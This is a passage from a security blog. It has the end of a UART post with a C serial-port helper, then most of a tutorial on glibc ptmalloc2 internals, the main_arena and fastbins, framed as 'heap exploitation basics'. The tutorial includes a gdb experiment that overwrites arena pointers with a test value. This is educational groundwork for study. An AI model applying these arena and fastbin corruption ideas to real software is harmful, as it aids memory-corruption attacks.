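If you'd rather pull the bytes out from your own code instead of picocom, here's a minimal C sketch using the POSIX termios API to open a serial device in raw 8N1 mode. The device path (FTDI cables usually show up as something like /dev/ttyUSB0 on Linux), the supported baud subset and the helper names are assumptions for illustration; it doesn't touch hardware flow control.

```c
#define _DEFAULT_SOURCE /* for cfmakeraw() on glibc */
#include <fcntl.h>
#include <termios.h>
#include <unistd.h>

/* Map a numeric baud rate onto the termios speed constant (subset only). */
speed_t baud_to_speed(long baud)
{
    switch (baud) {
    case 9600:   return B9600;
    case 19200:  return B19200;
    case 38400:  return B38400;
    case 57600:  return B57600;
    case 115200: return B115200;
    default:     return B0; /* unsupported in this sketch */
    }
}

/* Open a serial device in raw 8N1 mode at the given baud rate.
 * Returns a file descriptor, or -1 on any error. */
int serial_open(const char *path, long baud)
{
    speed_t speed = baud_to_speed(baud);
    if (speed == B0)
        return -1;

    int fd = open(path, O_RDWR | O_NOCTTY);
    if (fd < 0)
        return -1;

    struct termios tio;
    if (tcgetattr(fd, &tio) != 0) { /* fails if path isn't a terminal */
        close(fd);
        return -1;
    }
    cfmakeraw(&tio);                   /* no echo or line editing, 8 data bits */
    tio.c_cflag &= ~(PARENB | CSTOPB); /* no parity, one stop bit */
    tio.c_cflag |= CLOCAL | CREAD;     /* ignore modem lines, enable receiver */
    cfsetispeed(&tio, speed);
    cfsetospeed(&tio, speed);
    if (tcsetattr(fd, TCSANOW, &tio) != 0) {
        close(fd);
        return -1;
    }
    return fd;
}
```

Usage is roughly <span style="font-family: courier;">int fd = serial_open("/dev/ttyUSB0", 115200);</span> followed by <span style="font-family: courier;">read(fd, buf, sizeof buf)</span> in a loop, which is about what <span style="font-family: courier;">picocom -b 115200 /dev/ttyUSB0</span> does for you interactively.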
<div>
Anyway, that's it for this post. I'll cover more hands-on UART stuff soon! Stay tuned!</div>
</div>
<h2 style="text-align: left;">
References and Reading:</h2>
<br />
<ol style="text-align: left;">
<li><a href="http://www.ti.com/lit/ug/sprugp1/sprugp1.pdf">http://www.ti.com/lit/ug/sprugp1/sprugp1.pdf</a> </li>
<li><a href="http://www.devttys0.com/2012/11/reverse-engineering-serial-ports/">http://www.devttys0.com/2012/11/reverse-engineering-serial-ports/</a></li>
<li><a href="https://en.wikipedia.org/wiki/Universal_asynchronous_receiver-transmitter">https://en.wikipedia.org/wiki/Universal_asynchronous_receiver-transmitter</a> </li>
<li><a href="https://www.latticesemi.com/-/media/LatticeSemi/Documents/ReferenceDesigns/SZ/UARTUniversalAsynchronousReceiverTransmitterDocumentation.ashx?document_id=3466">https://www.latticesemi.com/-/media/LatticeSemi/Documents/ReferenceDesigns/SZ/UARTUniversalAsynchronousReceiverTransmitterDocumentation.ashx?document_id=3466</a> </li>
</ol>
</div>
</div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-29303980718565725282019-03-14T18:17:00.002-07:002019-03-14T18:30:13.817-07:00Glibc Heap Exploitation Basics : ptmalloc2 internals (Part 3) : The Main Arena<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Hi folks, this post is part of a series in which I try to explore the internals of ptmalloc2, glibc's malloc implementation, which is used for managing heap memory. In this post I'm going to pay specific attention to the <span style="font-family: "courier new" , "courier" , monospace;">main_arena</span> and the <span style="font-family: "courier new" , "courier" , monospace;">malloc_state</span> structure, which is used to store some important pointers for searching heap memory.<br />
<h2 style="text-align: left;">
The main arena</h2>
glibc bakes the main_arena struct right into process memory (it's a static variable in libc's own data section, not a chunk on the heap). It's a struct of the type <span style="font-family: "courier new" , "courier" , monospace;">malloc_state</span> and holds the following fields (<i>extract from glibc-2.23/malloc/malloc.c</i>):<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">struct malloc_state</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">{</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">&nbsp; /* Serialize access. */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">&nbsp; <b>mutex_t mutex;</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">&nbsp; /* Flags (formerly in max_fast). */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">&nbsp; <b>int flags;</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">&nbsp; /* Fastbins */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">&nbsp; <b>mfastbinptr fastbinsY[NFASTBINS];</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">&nbsp; /* Base of the topmost chunk -- not otherwise kept in a bin */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">&nbsp; <b>mchunkptr top;</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">&nbsp; /* The remainder from the most recent split of a small request */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">&nbsp; <b>mchunkptr last_remainder;</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">&nbsp; /* Normal bins packed as described above */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">&nbsp; <b>mchunkptr bins[NBINS * 2 - 2];</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">&nbsp; /* Bitmap of bins */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">&nbsp; <b>unsigned int binmap[BINMAPSIZE];</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">&nbsp; /* Linked list */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">&nbsp; <b>struct malloc_state *next;</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">&nbsp; /* Linked list for free arenas. Access to this field is serialized</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">&nbsp; &nbsp; &nbsp;by free_list_lock in arena.c. */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">&nbsp; <b>struct malloc_state *next_free;</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">&nbsp; /* Number of threads attached to this arena. 0 if the arena is on</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">&nbsp; &nbsp; &nbsp;the free list. Access to this field is serialized by</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">&nbsp; &nbsp; &nbsp;free_list_lock in arena.c. */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">&nbsp; <b>INTERNAL_SIZE_T attached_threads;</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">&nbsp; /* Memory allocated from the system in this arena. */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">&nbsp; <b>INTERNAL_SIZE_T system_mem;</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">&nbsp; <b>INTERNAL_SIZE_T max_system_mem;</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">};</span><br />
<div>
<br />
<br />
Here's what some of the interesting fields mean (<i>in addition to the already very helpful docs</i>):<br />
<br />
<ul style="text-align: left;">
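<li><span style="font-family: "courier new" , "courier" , monospace;"><b>mutex_t mutex</b> -</span> this field is an integer that can be used to prevent other threads from messing with the arena while it's being modified. We can see a confirmation of this in the code, which in its simplest fallback form (only compiled when <span style="font-family: "courier new" , "courier" , monospace;">mutex_init</span> isn't already defined, per the closing <span style="font-family: "courier new" , "courier" , monospace;">#endif</span>) treats the mutex as a plain "in use" flag:</li>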
</ul>
<div>
<br /></div>
<div>
<div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 29 /* The mutex functions used to do absolutely nothing, i.e. lock,</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 30 trylock and unlock would always just return 0. However, even</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 31 without any concurrently active threads, a mutex can be used</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 32 legitimately as an `in use' flag. To make the code that is</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 33 protected by a mutex async-signal safe, these macros would have to</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 34 be based on atomic test-and-set operations, for example. */</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 35 <b>typedef int mutex_t;</b></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 36 </span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 37 # define mutex_init(m) (*(m) = 0)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 38 # define mutex_lock(m) ({ *(m) = 1; 0; })</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 39 # define mutex_trylock(m) (*(m) ? 1 : ((*(m) = 1), 0))</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 40 # define mutex_unlock(m) (*(m) = 0)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 41 </span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 42 #endif /* !defined mutex_init */</span></div>
</div>
</div>
<div>
<br /></div>
<br />
<div>
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>int flags</b></span> - this is an integer bit field the arena uses to mark itself with properties, such as whether it currently holds fastbin chunks or whether its memory is contiguous. These properties can differ from arena to arena because there can be more than one arena (<i>peep at the linked list node below and the clues about <span style="font-family: "courier new" , "courier" , monospace;">attached_threads</span></i>). To make this field easy to use, there is an accompanying set of macros in the code:</li>
</ul>
<div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">1640<b> #define have_fastchunks(M) (((M)->flags & FASTCHUNKS_BIT) == 0)</b></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">1641 <b>#define clear_fastchunks(M) catomic_or (&(M)->flags, FASTCHUNKS_BIT)</b></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">1642 <b>#define set_fastchunks(M) catomic_and (&(M)->flags, ~FASTCHUNKS_BIT)</b></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">1643 </span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">...</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">1652 </span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">1653 <b>#define NONCONTIGUOUS_BIT (2U)</b></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">1654 </span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">1655 <b>#define contiguous(M) </b> (((M)->flags & NONCONTIGUOUS_BIT) == 0)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">1656 <b>#define noncontiguous(M)</b> (((M)->flags & NONCONTIGUOUS_BIT) != 0)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">1657 <b>#define set_noncontiguous(M)</b> ((M)->flags |= NONCONTIGUOUS_BIT)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">1658 <b>#define set_contiguous(M)</b> ((M)->flags &= ~NONCONTIGUOUS_BIT)</span></div>
</div>
<div>
<br /></div>
<div>
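These are pretty self-documenting, with one twist: <span style="font-family: "courier new" , "courier" , monospace;">FASTCHUNKS_BIT</span> is inverted, so a set bit means "no fastchunks". glibc does this so that a zero-filled arena starts out with <span style="font-family: "courier new" , "courier" , monospace;">have_fastchunks</span> true, which simplifies initialization checks. </div>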
</div>
<div>
<br /></div>
<div>
<ul style="text-align: left;">
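<li><b style="font-family: "courier new", courier, monospace;">fastbinsY - </b><span style="font-family: inherit;">an array (not a single pointer) of <span style="font-family: "courier new" , "courier" , monospace;">NFASTBINS</span> list heads, one per fastbin size. Each entry points to the most recently freed chunk of that size, and the rest of that bin is chained through each chunk's <span style="font-family: "courier new" , "courier" , monospace;">fd</span> pointer as a singly linked LIFO list. <i>As I may have mentioned before, fastbins are arranged by size, so what we have here is essentially a set of minimalist size-segregated free lists rather than a true priority heap.</i> </span></li>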
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>mchunkptr top</b></span> - pointer to the top chunk, i.e. the free space at the end of the heap that new chunks are carved from when no bin can satisfy a request.</li>
<li><i>skipping last_remainder for now</i></li>
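<li><span style="font-family: "courier new" , "courier" , monospace;"><b>mchunkptr bins</b></span> - the list heads for the regular (non-fast) bins: unsorted, small and large. Each bin uses two consecutive entries as the <i>fd</i>/<i>bk</i> pointers of a doubly linked list, which is why the array has <span style="font-family: "courier new" , "courier" , monospace;">NBINS * 2 - 2</span> slots; the first pair is the unsorted bin (bin 1). Most freed chunks above the fastbin max size end up on these lists, starting with the unsorted bin.</li>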
</ul>
<ul style="text-align: left;">
<li><b style="font-family: "Courier New", Courier, monospace;">unsigned int binmap</b><span style="font-family: inherit;"> - a bitmap with one bit per bin, which lets malloc skip over bins that are definitely empty when it searches for a chunk. We can see how it's used in the do_check_malloc_state function, which is thrown into the source for the sake of aiding debugging:</span></li>
</ul>
<div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"></span><br />
<div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">1576 #define mark_bin(m, i)<b> </b>((m)->binmap[idx2block (i)] |= idx2bit (i))</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">1577 #define unmark_bin(m, i)<b> </b>((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><b>1578 #define get_binmap(m, i) </b>((m)->binmap[idx2block (i)] & idx2bit (i))</span></div>
</div>
<span style="font-family: "courier new" , "courier" , monospace;">
<div>
...</div>
<div>
2111 static void</div>
<div>
<b>2112 do_check_malloc_state (mstate av)</b></div>
<div>
2113 {</div>
<div>
2114 int i;</div>
<div>
2115 mchunkptr p;</div>
<div>
2116 mchunkptr q;</div>
<div>
...</div>
</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">2188 /* binmap is accurate (except for bin 1 == unsorted_chunks) */</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">2189 if (i >= 2)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">2190 {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><b>2191 unsigned int binbit = get_binmap (av, i);</b></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">2192 int empty = last (b) == b;</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">2193 if (!binbit)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">2194 assert (empty);</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">2195 else if (!empty)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">2196 assert (binbit);</span></div>
</div>
</div>
<div>
<br /></div>
<div>
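So the check extracts the bin's bit ("binbit") and asserts that it agrees with the bin's real state: a clear bit means the bin must be empty, and a non-empty bin must have its bit set. A set bit on an empty bin is tolerated, because bits are only cleared lazily when malloc notices an empty bin during a search. Anyway, that's enough about the fields; let's see them in action. </div>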
</div>
<h2 style="text-align: left;">
Exploring the main_arena with gdb</h2>
<div>
To explore the <span style="font-family: "courier new" , "courier" , monospace;">main_arena</span> I whipped up a simple C program that allocates some chunks in series according to a size I specify on the command line.<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">> cat arena.c </span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">#include <stdio.h></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">#include <stdlib.h></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">#include <string.h></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">#include <unistd.h></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">#include <time.h></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">char *make_string(size_t length){</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>char *arr = (char *) malloc(length);</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>asm("int $3"); /* breakpoint: trap into gdb right after each malloc */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>return arr;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">}</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">void free_string(char *arr){</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>free(arr);</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>asm("int $3"); /* breakpoint: trap into gdb right after each free */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>return;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">}</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">/*</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>Generate chunks in a list with a single size</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>- shows us how fast chunks work</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">*/</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">void make_chunk_field(size_t chunk_length,size_t amount_of_chunks){<span style="white-space: pre;"> </span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>int index = 0;<span style="white-space: pre;"> </span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>char **chunks = malloc(amount_of_chunks*sizeof(char *)); </span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>//printf("[*] chunk array head at [%p]\n",&chunks);</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>for (index = 0;index < amount_of_chunks; index++){</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>chunks[index] = make_string(chunk_length);</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>memset(chunks[index],0x40+index,chunk_length);<span style="white-space: pre;"> </span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>}</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>for (index = 0; index < amount_of_chunks;index++){</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>memset(chunks[index],0xFF,chunk_length);<span style="white-space: pre;"> </span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>free_string(chunks[index]);</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>}</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">}</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">int main(int argc, char **argv){</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>int run = 0;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>if (argc < 4){</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>printf("Usage : %s [chunk length (bytes)] [number of chunks] [rounds]\n",argv[0]);</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>return 2;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>}</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>size_t chunk_length = atoi(argv[1]);</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>unsigned int number_of_chunks = atoi(argv[2]);</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>int cycles = atoi(argv[3]);</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>int index = 0;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>for (index =0;index<cycles;index++){</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>make_chunk_field(chunk_length,number_of_chunks);</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>}<span style="white-space: pre;"> </span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">}</span><br />
<div>
<br /></div>
I then ran this in gdb and set up a <span style="font-family: "courier new" , "courier" , monospace;">gdbinit</span> to dump the <span style="font-family: "courier new" , "courier" , monospace;">main_arena</span>. Simple <span style="font-family: "courier new" , "courier" , monospace;">gdbinit</span> file:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">> cat ~/.gdbinit</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">define hook-stop</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>x/16xg 0x603000</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>x/18xg &main_arena</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>info threads</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">end</span><br />
<div>
<br /></div>
<i>I also dump what is usually the start of the heap (0x603000 when I launch the program in gdb) and some thread information</i>. The first thing I wanted to know was which <span style="font-family: "courier new" , "courier" , monospace;">fastbinsY</span> slot each chunk size goes to, so I checked by practical demonstration. The basic procedure was:<br />
<br />
<ol style="text-align: left;">
<li>Allocate a bunch of chunks of a given size</li>
<li>Free all of them</li>
<li>At each free, check the main_arena <span style="font-family: "courier new" , "courier" , monospace;">fastbinsY</span> array contents</li>
</ol>
<div>
We of course need to know where fastbinsY starts. With gdb and glibc's debug symbols this is pretty easy: run the program, stop at a breakpoint and issue this command:</div>
<br />
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">(gdb) x/1xg <b>&main_arena->fastbinsY</b></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">0x7ffff7dd1b28 <main_arena+8>:<span style="white-space: pre;"> </span>0x0000000000000000</span></div>
<br />
The same trick works for the other fields if you're curious enough. Okay, so we know where <span style="font-family: "courier new" , "courier" , monospace;">fastbinsY</span> starts. Let's see what happens when we increase the chunk size by 10 bytes every time; basically I just ran <span style="font-family: "courier new" , "courier" , monospace;">arena.c</span> like this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6toth7RCf7TqQWFuDlQh0zoXC2JF-OiaGTM-GqOEj8mZHlLLQaX6unRQ6CVW_gLm6ewr7_dTC5fmKsVwQaDGTf4PHHSfJe5WJlImllKKXCv3MGGKDysiRl3qILZuAwOAgrZ9Vhjd5hBc/s1600/test_gdb_run.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="727" data-original-width="1486" height="312" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6toth7RCf7TqQWFuDlQh0zoXC2JF-OiaGTM-GqOEj8mZHlLLQaX6unRQ6CVW_gLm6ewr7_dTC5fmKsVwQaDGTf4PHHSfJe5WJlImllKKXCv3MGGKDysiRl3qILZuAwOAgrZ9Vhjd5hBc/s640/test_gdb_run.png" width="640" /></a></div>
<br />
<div>
<br /></div>
<div>
The <span style="font-family: "courier new" , "courier" , monospace;">r 10 5 1</span> here means: run with chunks of 10 bytes, allocate an array of 5 chunks, and allocate and then free them for 1 round. After collecting enough data for chunk sizes 10, 20, 30, ... until <span style="font-family: "courier new" , "courier" , monospace;">fastbinsY</span> was no longer used, I saw this:</div>
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWULgKSItBimpkGCIZhWo8O11C6fJ1dj8_b7nZXGgVLy5ok_0Gyiau_lWCn4Cq76SBWgTXPCxNvGJPHDLZNZhTbS45G53DQMry5IkAGD1xhU-rPgFttnFOvyIlJaL_UyFkRnlvh-NMAOA/s1600/size_sample.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="411" data-original-width="1508" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWULgKSItBimpkGCIZhWo8O11C6fJ1dj8_b7nZXGgVLy5ok_0Gyiau_lWCn4Cq76SBWgTXPCxNvGJPHDLZNZhTbS45G53DQMry5IkAGD1xhU-rPgFttnFOvyIlJaL_UyFkRnlvh-NMAOA/s1600/size_sample.png" /></a></div>
<br />
<br />
So clearly, on my machine, as soon as a requested chunk is bigger than 120 bytes, the freed chunk no longer goes into a fastbin and lands in the unsorted bin instead. We can see this when we request 130-byte chunks:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNk8d7fMollScBbFPNVPe1qx5eyHhfYyh6L87kbm3JeX4mTJ1DsgcC5Bqr_wJCVrvttcJmtG9_kYwFgOGKZD9pGWmfCl8lfPN7Uo1bHsyBts_i58eMcKyTq9XdiFpJdfM1uAz17nz3LXY/s1600/130_byte_read.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="614" data-original-width="856" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNk8d7fMollScBbFPNVPe1qx5eyHhfYyh6L87kbm3JeX4mTJ1DsgcC5Bqr_wJCVrvttcJmtG9_kYwFgOGKZD9pGWmfCl8lfPN7Uo1bHsyBts_i58eMcKyTq9XdiFpJdfM1uAz17nz3LXY/s1600/130_byte_read.png" /></a></div>
<br />
So what happens if you try to change main arena fields while the heap is in use, i.e. while the program is running? Let's see:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioXBfNfR1-fDhpr7xvZC3ffQ1PT2DW7xo3L6PbXXOblXBql4syWVRjl2yfZpErxXVwRhgxyTHZ-iASjX8zjlHfGDXHfSy4tBL4FmpXTJL6J45qPe46DZ7aUlK4CbAPX3_CDO4E8KCV_u8/s1600/edit_arena_inflight.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="756" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioXBfNfR1-fDhpr7xvZC3ffQ1PT2DW7xo3L6PbXXOblXBql4syWVRjl2yfZpErxXVwRhgxyTHZ-iASjX8zjlHfGDXHfSy4tBL4FmpXTJL6J45qPe46DZ7aUlK4CbAPX3_CDO4E8KCV_u8/s1600/edit_arena_inflight.png" /></a></div>
<br />
Glibc aborts when you mess with the main_arena, but the error is interesting here: it's not about the main_arena, it's about a fastbin chunk. That suggests some legitimate fastbin handling went ahead using the corrupted data. We can see what is happening here with another experiment, by checking which field of the fastbin chunk actually ends up in the <span style="font-family: "courier new" , "courier" , monospace;">main_arena</span>, as follows:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSyZcR-Hbrkw-kGtGzKLJQCKJpNzA4o8-QDrMlpDMBnkTpWv4ZNKBWjBLNH0dJpDlyrAlv8kaVFcUW6umNMGbkWdKTw5DC3pM-7a5wA52WsBgW88NJlY-i8yvVI9UV_6OJkaN12ee_msk/s1600/fake_fastbin_pointer_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="610" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSyZcR-Hbrkw-kGtGzKLJQCKJpNzA4o8-QDrMlpDMBnkTpWv4ZNKBWjBLNH0dJpDlyrAlv8kaVFcUW6umNMGbkWdKTw5DC3pM-7a5wA52WsBgW88NJlY-i8yvVI9UV_6OJkaN12ee_msk/s1600/fake_fastbin_pointer_1.png" /></a></div>
<br />
The screenshot above was produced by running the alloc/dealloc cycle for 2 rounds. What I did was:<br />
<br />
<br />
<ol style="text-align: left;">
<li>allocated some chunks to prep the heap (<i>all the same size, running the same arena.c quoted above</i>)</li>
<li>then allocated them again in the second round</li>
<li>and while that was in flight, tinkered with the main_arena pointers. </li>
</ol>
After injecting a sample pointer, we can see that the <span style="font-family: "courier new" , "courier" , monospace;">0x434343</span> value gets popped into the main arena at the end of the error dump:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
